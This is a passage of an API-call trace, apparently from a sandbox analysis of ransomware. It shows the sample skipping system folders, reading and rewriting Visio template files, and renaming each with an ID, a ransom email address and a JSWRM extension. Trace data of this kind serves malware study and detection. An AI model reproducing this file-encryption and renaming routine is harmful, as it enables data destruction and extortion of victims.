ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4ee1, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CEILPL_M.VSTX", cAlternateFileName="CEILPL~1.VST")) returned 1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2=".") returned 1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="..") returned 1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="...") returned 1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="windows") returned -1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="recovery") returned -1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="perflogs") returned -1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="documents and settings") returned -1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="system volume information") returned -1 [0146.445] lstrcmpiW (lpString1="CEILPL_M.VSTX", lpString2="msocache") returned -1 [0146.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CEILPL_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CEILPL_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CEILPL_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CEILPL_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CEILPL_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CEILPL_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CEILPL_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ceilpl_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.447] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20193) returned 1 [0146.447] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.447] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4ee0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4ee0, lpOverlapped=0x0) returned 1 [0146.451] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.451] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4ee0, lpOverlapped=0x0) returned 1 [0146.451] CloseHandle (hObject=0x314) returned 1 [0146.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CEILPL_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ceilpl_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CEILPL_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ceilpl_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.453] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4db4, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CEILPL_U.VSTX", cAlternateFileName="CEILPL~2.VST")) returned 1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2=".") returned 1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="..") returned 1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="...") returned 1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="windows") returned -1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="recovery") returned -1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="perflogs") returned -1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="documents and settings") returned -1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="system volume information") returned -1 [0146.453] lstrcmpiW (lpString1="CEILPL_U.VSTX", lpString2="msocache") returned -1 [0146.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CEILPL_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CEILPL_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CEILPL_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CEILPL_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CEILPL_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CEILPL_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CEILPL_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ceilpl_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.454] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19892) returned 1 [0146.454] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.454] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4db0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4db0, lpOverlapped=0x0) returned 1 [0146.457] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.457] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4db0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4db0, lpOverlapped=0x0) returned 1 [0146.457] CloseHandle (hObject=0x314) returned 1 [0146.457] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CEILPL_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ceilpl_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CEILPL_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ceilpl_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.458] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x12f87, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CFF_HORIZONTAL_M.VSTX", cAlternateFileName="CFF_HO~1.VST")) returned 1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2=".") returned 1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="..") returned 1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="...") returned 1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="windows") returned -1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="recovery") returned -1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="perflogs") returned -1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="documents and settings") returned -1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="system volume information") returned -1 [0146.458] lstrcmpiW (lpString1="CFF_HORIZONTAL_M.VSTX", lpString2="msocache") returned -1 [0146.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_HORIZONTAL_M.VSTX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0146.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_HORIZONTAL_M.VSTX", cchWideChar=21, lpMultiByteStr=0x241268, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_HORIZONTAL_M.VSTX", lpUsedDefaultChar=0x0) returned 21 [0146.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_HORIZONTAL_M.VSTX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0146.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_HORIZONTAL_M.VSTX", cchWideChar=21, lpMultiByteStr=0x241038, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_HORIZONTAL_M.VSTX", lpUsedDefaultChar=0x0) returned 21 [0146.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_HORIZONTAL_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_horizontal_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.459] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=77703) returned 1 [0146.459] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.460] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12f80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x12f80, lpOverlapped=0x0) returned 1 [0146.467] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.467] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12f80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x12f80, lpOverlapped=0x0) returned 1 [0146.468] CloseHandle (hObject=0x314) returned 1 [0146.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_HORIZONTAL_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_horizontal_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_HORIZONTAL_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_horizontal_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.469] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x11c50, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CFF_HORIZONTAL_U.VSTX", cAlternateFileName="CFF_HO~2.VST")) returned 1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2=".") returned 1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="..") returned 1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="...") returned 1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="windows") returned -1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="recovery") returned -1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="perflogs") returned -1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="documents and settings") returned -1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.469] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="system volume information") returned -1 [0146.470] lstrcmpiW (lpString1="CFF_HORIZONTAL_U.VSTX", lpString2="msocache") returned -1 [0146.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_HORIZONTAL_U.VSTX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0146.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_HORIZONTAL_U.VSTX", cchWideChar=21, lpMultiByteStr=0x241218, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_HORIZONTAL_U.VSTX", lpUsedDefaultChar=0x0) returned 21 [0146.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_HORIZONTAL_U.VSTX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0146.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_HORIZONTAL_U.VSTX", cchWideChar=21, lpMultiByteStr=0x241380, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_HORIZONTAL_U.VSTX", lpUsedDefaultChar=0x0) returned 21 [0146.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_HORIZONTAL_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_horizontal_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.472] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=72784) returned 1 [0146.472] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.472] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11c50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x11c50, lpOverlapped=0x0) returned 1 [0146.478] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.478] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11c50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x11c50, lpOverlapped=0x0) returned 1 [0146.479] CloseHandle (hObject=0x314) returned 1 [0146.479] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_HORIZONTAL_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_horizontal_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_HORIZONTAL_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_horizontal_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.480] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x132ba, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CFF_SHAREDPROCESS_M.VSTX", cAlternateFileName="CFF_SH~1.VST")) returned 1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2=".") returned 1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="..") returned 1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="...") returned 1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="windows") returned -1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="recovery") returned -1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="perflogs") returned -1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="documents and settings") returned -1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="system volume information") returned -1 [0146.480] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_M.VSTX", lpString2="msocache") returned -1 [0146.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_SHAREDPROCESS_M.VSTX", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0146.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_SHAREDPROCESS_M.VSTX", cchWideChar=24, lpMultiByteStr=0x241380, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_SHAREDPROCESS_M.VSTX", lpUsedDefaultChar=0x0) returned 24 [0146.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_SHAREDPROCESS_M.VSTX", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0146.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_SHAREDPROCESS_M.VSTX", cchWideChar=24, lpMultiByteStr=0x241100, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_SHAREDPROCESS_M.VSTX", lpUsedDefaultChar=0x0) returned 24 [0146.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_SHAREDPROCESS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_sharedprocess_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.482] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=78522) returned 1 [0146.482] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.482] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x132b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x132b0, lpOverlapped=0x0) returned 1 [0146.492] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.492] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x132b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x132b0, lpOverlapped=0x0) returned 1 [0146.492] CloseHandle (hObject=0x314) returned 1 [0146.493] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_SHAREDPROCESS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_sharedprocess_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_SHAREDPROCESS_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_sharedprocess_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.494] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x12764, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CFF_SHAREDPROCESS_U.VSTX", cAlternateFileName="CFF_SH~2.VST")) returned 1 [0146.494] lstrcmpiW 